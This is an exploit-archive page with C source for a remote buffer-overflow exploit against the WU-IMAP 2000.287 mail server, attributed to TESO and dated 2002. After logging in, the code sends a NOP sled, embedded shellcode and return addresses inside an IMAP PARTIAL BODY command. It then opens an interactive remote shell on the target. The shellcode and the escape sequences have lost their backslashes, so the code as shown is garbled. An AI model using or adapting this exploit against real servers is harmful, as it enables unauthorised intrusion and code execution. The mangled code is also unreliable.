[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WU-IMAP 2000.287(1-2) Remote Exploit
# Published : 2002-06-25
# Author : Teso
# Previous Title : Solaris 8 dtspcd Heap Overflow
# Next Title : SSH (x2) Remote Root Exploit
/* 7350owex- x86/linux WU-IMAP 2000.287(1-2) remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2002
* All Rights Reserved
*
*****************************************************************************
* bug found by scut 2002/06/25
* thanks to halvar,scut,typo,random,edi,xdr.
* special thanks to security.is.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"
char shellcode[] =
"x55x89xe5x55x89xe5x83xecx28xc6x45xd8x2fxc6x45xdc"
"x2fxc6x45xd9x5fxc6x45xdax5axc6x45xdbx5fxc6x45xdd"
"x5fxc6x45xdex5fx83x45xd9x03x83x45xdax0fx83x45xdb"
"x0fx83x45xddx14x83x45xdex09x31xc0x89x45xdfx89x45"
"xf4x8dx45xd8x89x45xf0x83xecx04x8dx45xf0x31xd2x89"
"xd3x89xc1x8bx45xf0x89xc3x31xc0x83xc0x0bxcdx80x31"
"xc0x40xcdx80";
int main(int argc, char *argv[])
{
int s, i;
fd_set fds;
char tmp[2048], buf[1060];
char *target, *login, *pass, *p;
struct sockaddr_in sock;
unsigned long retaddr;
fprintf(stderr, "%sn", "7350owex by scut and zippo!");
if (argc != 4)
{
fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>n", argv[0]);
exit(-1);
}
retaddr = RETADDR;
target = argv[1];
login = argv[2];
pass = argv[3];
s = socket(AF_INET, SOCK_STREAM, 0);
sock.sin_port = htons(143);
sock.sin_family = AF_INET;
sock.sin_addr.s_addr = inet_addr(target);
printf("nConnecting to %s:143...", target);
fflush(stdout);
if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
{
printf("failedn");
exit(-1);
}
else
recv(s, tmp, sizeof(tmp), 0);
printf("donenLogging in...");
fflush(stdout);
snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %sn", login, pass);
send(s, tmp, strlen(tmp), 0);
recv(s, tmp, sizeof(tmp), 0);
if (!strstr(tmp, "completed"))
{
printf("failedn");
exit(-1);
}
printf("donenExploiting...");
fflush(stdout);
dprintf(s, "A0666 SELECT %s/%sn", MAILDIR, login);
memset(buf, 0x0, sizeof(buf));
p = buf;
memset(p, 0x90, 928);
p += 928;
memcpy(p, shellcode, 100);
p += 100;
for (i=0; i<6; i++)
{
memcpy(p, &retaddr, 0x4);
p += 0x4;
}
snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1n", buf);
send(s, tmp, strlen(tmp), 0);
dprintf(s, "A0666 LOGOUTn");
sleep(5);
printf("donenn");
read(s, tmp, sizeof(tmp));
dprintf(s, "uname -a;id;n");
memset(tmp, 0x0, sizeof(tmp));
while (1)
{
FD_ZERO(&fds);
FD_SET(s, &fds);
FD_SET(1, &fds);
select((s+1), &fds, 0, 0, 0);
if (FD_ISSET(s, &fds))
{
if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
{
fprintf(stderr, "Connection closedn");
exit(0);
}
write(0, tmp, i);
}
if (FD_ISSET(1, &fds))
{
i = read(1, tmp, sizeof(tmp));
send(s, tmp, i, 0);
}
}
return;
}
// www.Syue.com [2002-06-25]